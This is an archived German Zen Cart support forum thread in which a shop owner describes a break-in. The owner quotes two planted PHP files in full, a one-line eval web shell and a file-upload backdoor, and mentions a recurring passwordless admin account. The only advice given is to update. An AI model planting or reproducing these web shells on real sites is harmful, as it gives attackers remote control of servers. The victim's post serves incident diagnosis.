Ankündigung

Einklappen
Keine Ankündigung bisher.

Hacker auf Seite

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

    Hacker auf Seite

    wir hatten ein Hackerangriff auf unseren shop. Es wurden 2 Dateien in images gefunden, die auch in zen_record_company eingetragen waren.

    Datei 1: x00x.php enthält:
    <?php eval(stripslashes($_REQUEST["_str"])); ?>

    Datei 2; x2.php enthält:
    ?php
    @ini_set("max_execution_time", 0);
    @ini_set("memory_limit", "32");
    @ini_set("post_max_size","32");
    @ini_set("upload_max_filesize", "16");
    @set_magic_quotes_runtime(0);
    @error_reporting(0);

    if(isset($_FILES["userfile"]["name"])){
    $uploaddir = getcwd() . "/";
    $uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);

    echo "<p>";

    if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
    } else {
    echo "Upload failed";
    }

    echo "</p>";
    echo "<pre>";
    echo "Here is some more debugging info:";
    print_r($_FILES);
    if ($_FILES["userfile"]["error"] == 0){
    echo "<br><br><a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}</a><br><br>";
    exit;
    }
    echo "</pre>";
    } else if (isset($_GET["up"])) {
    echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
    echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
    echo "Send this file: <input name=\"userfile\" type=\"file\" />";
    echo "<input type=\"submit\" value=\"Send File\" />";
    echo "</form>";
    echo "The Roof Is On Fire " . (999 * 4);
    exit;
    }

    ?>

    Was machen diese Dateien?
    Wir haben sie gelöscht.

    Im Admin Bereich ist ein Admin mit namen: webadmin, E-mail: localhost, ohne passwort vorhanden.

    Darf dieser dort sein? Haben in gelöscht ist aber wieder vorhanden. Wir dieser ev. von shop selbst benötigt? Falls er nicht dahin gehört wir kommt er dahin und wie kann das gestoppt werden.
    Zuletzt geändert von rhauser; 03.05.2011, 13:34.

    #2
    Die einzige Lösung:

    Kommentar


      #3
      Nachtrag, update auf aktuelle Version.

      Kommentar

      Info zu diesem Forenarchiv:
      Mit Release von 1.5.7 wurde die deutsche Zen Cart Version auf eine reine DIY-Lösung umgestellt.
      Für einen Support via Forum stehen keine personellen und zeitlichen Ressourcen mehr zur Verfügung.
      Dieses Supportforum bleibt im Nur-Lesen-Modus als Wissensarchiv noch online verfügbar.
      PM Funktionalität, Registrierung und Posten neuer Beiträge sind deaktiviert.
      Zugriff auf Anhänge in den Postings ist auch ohne Registrierung/Einloggen möglich.
      FAQ und Downloadbereich des Forums wurden in die neue umfangreiche Knowledgebase auf der zen-cart-pro.at Website übernommen.

      Das Development der deutschen Zen Cart Version geht wie bisher auf Github weiter.
      Wir werden auch weiterhin neue Versionen bereitstellen und die Onlinedokumentation/Knowledgebase aktualisieren.
      Fehler in der Software können auf Github als Issues gemeldet werden.
      Follow us
      aktuelle version
      Zen Cart 1.5.7g deutsch
      vom 12.12.2023
      [Download]
      Lädt...
      X